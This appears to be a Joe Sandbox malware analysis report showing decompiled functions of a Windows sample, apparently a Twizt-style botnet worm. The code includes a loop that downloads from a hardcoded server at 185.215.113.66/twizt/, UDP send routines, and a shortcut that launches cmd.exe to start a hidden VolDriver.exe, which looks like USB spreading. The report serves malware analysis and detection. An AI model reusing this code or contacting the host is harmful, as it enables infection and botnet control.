                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D84F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D878
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D882
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3871184103-2352012373
                                                                                  • Opcode ID: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction ID: 266a7dd59df556f887e0a4dfc4e5eaf5996777bbeb911e957400ba413950654c
                                                                                  • Opcode Fuzzy Hash: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction Fuzzy Hash: 1A110A75E40208ABDB10DFD4CC49FDEB7B5AB08700F1085A5F9116B2D0C7B5AA44CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 97%
                                                                                  			E00404580(intOrPtr _a12, intOrPtr _a16) {
                                                                                  				signed int _v5;
                                                                                  				void* _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				long _v36;
                                                                                  				signed char _t76;
                                                                                  				void* _t79;
                                                                                  				intOrPtr _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				signed char _t91;
                                                                                  				signed int _t141;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				void* _t169;
                                                                                  
                                                                                  				_v5 = 0;
                                                                                  				EnterCriticalSection(0x4143f0);
                                                                                  				_t111 = _a12;
                                                                                  				_t76 = E0040B550(_a12, _a16);
                                                                                  				_t159 = _t158 + 8;
                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                  					_t79 = E0040B4F0(_t111, _a12);
                                                                                  					_t160 = _t159 + 4;
                                                                                  					_v12 = _t79;
                                                                                  					if(_v12 != 0) {
                                                                                  						_v5 = 1;
                                                                                  						_v13 = 0;
                                                                                  						_v20 = 0;
                                                                                  						while(1) {
                                                                                  							_t169 = _v20 -  *0x41440c; // 0x0
                                                                                  							if(_t169 >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_v24 = _v20 * 0x110 +  *0x414408;
                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x108)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00409020(_a12, _a16);
                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x100)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040AE60( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                  								E004058A0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_t160 = _t160 + 0x3c;
                                                                                  								_v13 = 1;
                                                                                  							} else {
                                                                                  								_v20 = _v20 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                  							_t91 = E004040F0(_a16, _v12, _a12, _a16, 1);
                                                                                  							_t160 = _t160 + 0x10;
                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                  								 *0x41440c = 0;
                                                                                  								_v5 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						E00408FB0(_v12);
                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                  							_v28 = CreateFileW(0x414620, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                  							if(_v28 != 0xffffffff) {
                                                                                  								_v32 = 0;
                                                                                  								while(1) {
                                                                                  									__eflags = _v32 -  *0x41440c; // 0x0
                                                                                  									if(__eflags >= 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t87 =  *0x414408; // 0x0
                                                                                  									_t88 =  *0x414408; // 0x0
                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                  									_t141 = _v32 + 1;
                                                                                  									__eflags = _t141;
                                                                                  									_v32 = _t141;
                                                                                  								}
                                                                                  								FlushFileBuffers(_v28);
                                                                                  								CloseHandle(_v28);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x4143f0);
                                                                                  				return _v5;
                                                                                  			}





















                                                                                  0x00404588
                                                                                  0x00404591
                                                                                  0x0040459b
                                                                                  0x0040459f
                                                                                  0x004045a4
                                                                                  0x004045ac
                                                                                  0x004045b6
                                                                                  0x004045bb
                                                                                  0x004045be
                                                                                  0x004045c5
                                                                                  0x004045cb
                                                                                  0x004045cf
                                                                                  0x004045d3
                                                                                  0x004045e5
                                                                                  0x004045e8
                                                                                  0x004045ee
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404603
                                                                                  0x00404612
                                                                                  0x00404621
                                                                                  0x0040462d
                                                                                  0x00404648
                                                                                  0x00404654
                                                                                  0x00404664
                                                                                  0x00404678
                                                                                  0x004046a6
                                                                                  0x004046b2
                                                                                  0x004046ce
                                                                                  0x004046d3
                                                                                  0x004046d6
                                                                                  0x00404614
                                                                                  0x004045e2
                                                                                  0x00000000
                                                                                  0x004045e2
                                                                                  0x00000000
                                                                                  0x00404612
                                                                                  0x004046e5
                                                                                  0x004046e7
                                                                                  0x004046f7
                                                                                  0x004046fc
                                                                                  0x00404702
                                                                                  0x00404704
                                                                                  0x00404706
                                                                                  0x00404710
                                                                                  0x00404710
                                                                                  0x00404704
                                                                                  0x00404718
                                                                                  0x00404724
                                                                                  0x00404726
                                                                                  0x00404746
                                                                                  0x00404749
                                                                                  0x0040474d
                                                                                  0x0040474f
                                                                                  0x00404761
                                                                                  0x00404764
                                                                                  0x0040476a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040477b
                                                                                  0x00404791
                                                                                  0x004047a2
                                                                                  0x0040475b
                                                                                  0x0040475b
                                                                                  0x0040475e
                                                                                  0x0040475e
                                                                                  0x004047ae
                                                                                  0x004047b8
                                                                                  0x004047b8
                                                                                  0x0040474d
                                                                                  0x00404726
                                                                                  0x004045c5
                                                                                  0x004047c3
                                                                                  0x004047d1

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 00404591
                                                                                  • CreateFileW.KERNEL32(00414620,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A827,006A0266), ref: 00404740
                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004047A2
                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047AE
                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047B8
                                                                                  • LeaveCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 004047C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                  • String ID:
                                                                                  • API String ID: 2945370292-0
                                                                                  • Opcode ID: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction ID: 01e06390de1b97125c550d85264ffb387e1c01f9fade460cde3dda761564bb80
                                                                                  • Opcode Fuzzy Hash: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction Fuzzy Hash: 4A71A3B5A00209ABCB04CF94D985FEFB7B5BB88304F148169E505B7382D779A941CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040BF50(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                  				long _v8;
                                                                                  				signed int* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t49;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 == 0) {
                                                                                  					L8:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v12 = _a4;
                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                  				E0040BED0( &(_v12[1]), _v12);
                                                                                  				if(_a12 != 0) {
                                                                                  					_v12[7] = E00408EA0(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                  					if(_v12[7] != 0) {
                                                                                  						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                  						if(_v16 != 0) {
                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                  							if(_a24 != 0) {
                                                                                  								_t49 = GetCurrentProcess();
                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                  							}
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                  				goto L8;
                                                                                  			}







                                                                                  0x0040bf56
                                                                                  0x0040bf61
                                                                                  0x0040c038
                                                                                  0x0040c03e
                                                                                  0x0040c03e
                                                                                  0x0040bf6a
                                                                                  0x0040bf74
                                                                                  0x0040bf7e
                                                                                  0x0040bf8a
                                                                                  0x0040bfaf
                                                                                  0x0040bfb9
                                                                                  0x0040bfd5
                                                                                  0x0040bfdc
                                                                                  0x0040bfec
                                                                                  0x0040bffa
                                                                                  0x0040c000
                                                                                  0x0040c00c
                                                                                  0x0040c01e
                                                                                  0x0040c01e
                                                                                  0x0040c024
                                                                                  0x0040c024
                                                                                  0x0040bfdc
                                                                                  0x0040bfb9
                                                                                  0x0040c032
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BED0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF10
                                                                                    • Part of subcall function 0040BED0: CloseHandle.KERNEL32(?), ref: 0040BF29
                                                                                  • CreateThread.KERNEL32 ref: 0040BFCF
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2251373460-0
                                                                                  • Opcode ID: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction ID: 5aaab35954c252b20d942d79868cba7d8a41f7cfd36b01251640d95963f0b6d7
                                                                                  • Opcode Fuzzy Hash: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction Fuzzy Hash: 23311E74A00208EFDB04DF94D889F9EBBB5FF48314F1081A9E905A7391D779AA81CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00407CC0(signed int _a4, signed int _a8) {
                                                                                  
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 | _a4;
                                                                                  				_a8 = _a8 | _a8;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                  				return _a4;
                                                                                  			}



                                                                                  0x00407ccd
                                                                                  0x00407cde
                                                                                  0x00407ce7
                                                                                  0x00407cea
                                                                                  0x00407d00
                                                                                  0x00407d1c
                                                                                  0x00407d25
                                                                                  0x00407d28
                                                                                  0x00407d3e
                                                                                  0x00407d5a
                                                                                  0x00407d63
                                                                                  0x00407d66
                                                                                  0x00407d72

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction ID: 2c2ab6fddce176d3a51b6a04538834b606437382d20241cd374fb35f0ceee124
                                                                                  • Opcode Fuzzy Hash: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction Fuzzy Hash: B8111F32504518AB8B20EF5EC88268ABBD6EF84361B15C136FC2CDF759D634D9514BD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00405900() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				char _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				signed int _v176;
                                                                                  				signed char _t36;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  
                                                                                  				_v44 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v172 = 0x411138;
                                                                                  				_v168 = 0x41113c;
                                                                                  				_v164 = 0x411140;
                                                                                  				_v160 = 0x411144;
                                                                                  				_v156 = 0x411148;
                                                                                  				_v152 = 0x41114c;
                                                                                  				while(1) {
                                                                                  					Sleep(0x3e8);
                                                                                  					_v176 = 0;
                                                                                  					while(_v176 < 6) {
                                                                                  						Sleep(0x3e8);
                                                                                  						_push( *((intOrPtr*)(_t46 + _v176 * 4 - 0xa8)));
                                                                                  						_push("http://185.215.113.66/twizt/");
                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                  						_t36 = E0040D7F0( &_v148, _t46 + _v176 * 4 - 0x28);
                                                                                  						_t47 = _t47 + 0x18;
                                                                                  						if((_t36 & 0x000000ff) == 1) {
                                                                                  							E0040D890( &_v148, 0);
                                                                                  							_t47 = _t47 + 8;
                                                                                  						}
                                                                                  						_v176 = _v176 + 1;
                                                                                  					}
                                                                                  					Sleep(0xdbba0);
                                                                                  				}
                                                                                  			}
























                                                                                  0x00405909
                                                                                  0x00405912
                                                                                  0x00405915
                                                                                  0x00405918
                                                                                  0x0040591b
                                                                                  0x0040591e
                                                                                  0x00405921
                                                                                  0x00405924
                                                                                  0x00405927
                                                                                  0x0040592a
                                                                                  0x0040592d
                                                                                  0x00405937
                                                                                  0x00405941
                                                                                  0x0040594b
                                                                                  0x00405955
                                                                                  0x0040595f
                                                                                  0x00405969
                                                                                  0x0040596e
                                                                                  0x00405974
                                                                                  0x0040598f
                                                                                  0x0040599d
                                                                                  0x004059b0
                                                                                  0x004059b1
                                                                                  0x004059c2
                                                                                  0x004059dd
                                                                                  0x004059e2
                                                                                  0x004059eb
                                                                                  0x004059f6
                                                                                  0x004059fb
                                                                                  0x004059fb
                                                                                  0x00405989
                                                                                  0x00405989
                                                                                  0x00405a05
                                                                                  0x00405a05

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$wsprintf
                                                                                  • String ID: %s%s$http://185.215.113.66/twizt/
                                                                                  • API String ID: 3195947292-3378761964
                                                                                  • Opcode ID: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction ID: 33ee1419d531fd34fd9c2865182aea181f8c03b5f59c5093f7aa5c1a3f23e5cd
                                                                                  • Opcode Fuzzy Hash: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction Fuzzy Hash: 7F2151B0D00318EFDB50DFA4CD45BDEBBB4BB09304F5081AAD64DB6281E7785A848F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040DF70(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                  				short _v6;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v20;
                                                                                  				short _v22;
                                                                                  				int* _v24;
                                                                                  				char _v25;
                                                                                  				char _v29;
                                                                                  				int* _v52;
                                                                                  				char _v53;
                                                                                  				short _t30;
                                                                                  				short _t35;
                                                                                  				long _t38;
                                                                                  				int* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				void* _t60;
                                                                                  				int _t64;
                                                                                  				long _t67;
                                                                                  
                                                                                  				_t50 = _a4;
                                                                                  				_t64 = __eax;
                                                                                  				_t30 = 0;
                                                                                  				_v25 = 0;
                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                  					L12:
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					_t60 = __eax + 4;
                                                                                  					_t45 = E00408E60(_t60);
                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                  					_v24 = _t45;
                                                                                  					 *_t45 = _t64;
                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v10 = 0;
                                                                                  					_v6 = 0;
                                                                                  					_t35 = _a16;
                                                                                  					_v20 = 2;
                                                                                  					__imp__#9(_t35);
                                                                                  					_v22 = _t35;
                                                                                  					_v20 = _a12;
                                                                                  					if(_t60 == 0) {
                                                                                  						L10:
                                                                                  						_v29 = 1;
                                                                                  						E00408FB0(_t45);
                                                                                  						return _v29;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t38 = _a4;
                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                  							_t67 = _t38;
                                                                                  							if(_t67 == 0xffffffff) {
                                                                                  								break;
                                                                                  							}
                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                  							_t60 = _t60 - _t67;
                                                                                  							_t45 = _t45 + _t67;
                                                                                  							if(_t60 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v53 = 1;
                                                                                  								E00408FB0(_v52);
                                                                                  								return _v53;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						if(_t60 != 0) {
                                                                                  							E00408FB0(_v52);
                                                                                  							_t30 = _v53;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t45 = _v52;
                                                                                  							goto L10;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  			}






















                                                                                  0x0040df79
                                                                                  0x0040df7e
                                                                                  0x0040df80
                                                                                  0x0040df83
                                                                                  0x0040df89
                                                                                  0x0040e08a
                                                                                  0x0040e090
                                                                                  0x0040dfad
                                                                                  0x0040dfad
                                                                                  0x0040dfb6
                                                                                  0x0040dfbd
                                                                                  0x0040dfc1
                                                                                  0x0040dfc5
                                                                                  0x0040dfc7
                                                                                  0x0040dfce
                                                                                  0x0040dfd2
                                                                                  0x0040dfd6
                                                                                  0x0040dfda
                                                                                  0x0040dfdf
                                                                                  0x0040dfeb
                                                                                  0x0040dff0
                                                                                  0x0040dff9
                                                                                  0x0040dffe
                                                                                  0x0040e004
                                                                                  0x0040e060
                                                                                  0x0040e061
                                                                                  0x0040e066
                                                                                  0x0040e078
                                                                                  0x0040e006
                                                                                  0x0040e006
                                                                                  0x0040e006
                                                                                  0x0040e018
                                                                                  0x0040e01e
                                                                                  0x0040e023
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e02d
                                                                                  0x0040e033
                                                                                  0x0040e035
                                                                                  0x0040e039
                                                                                  0x00000000
                                                                                  0x0040e03b
                                                                                  0x0040e040
                                                                                  0x0040e045
                                                                                  0x0040e057
                                                                                  0x0040e057
                                                                                  0x00000000
                                                                                  0x0040e039
                                                                                  0x0040e05a
                                                                                  0x0040e07e
                                                                                  0x0040e083
                                                                                  0x00000000
                                                                                  0x0040e05c
                                                                                  0x0040e05c
                                                                                  0x00000000
                                                                                  0x0040e05c
                                                                                  0x0040e05a
                                                                                  0x0040e004
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DFC7
                                                                                  • htons.WS2_32(?), ref: 0040DFF0
                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040E018
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E02D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                  • String ID: pdu
                                                                                  • API String ID: 2164660128-2320407122
                                                                                  • Opcode ID: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction ID: d66807eb1e7b0d5154e21252e4693ec0aa38c6c5b5b9df1ad79a440d19662bd5
                                                                                  • Opcode Fuzzy Hash: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction Fuzzy Hash: 8B31F2362043119FC710DF69D880A9BB7E4AFC9714F04497EF99897381DA7489198BEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 54%
                                                                                  			E00404980(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				short _v540;
                                                                                  				char* _t37;
                                                                                  				intOrPtr _t42;
                                                                                  
                                                                                  				__imp__CoInitialize(0);
                                                                                  				_t37 =  &_v12;
                                                                                  				__imp__CoCreateInstance(0x410348, 0, 1, 0x410338, _t37);
                                                                                  				_v8 = _t37;
                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x4140cc, 0x4140cc);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                  					_t42 =  *_v12;
                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410358,  &_v16);
                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  					}
                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  				}
                                                                                  				return _t37;
                                                                                  			}









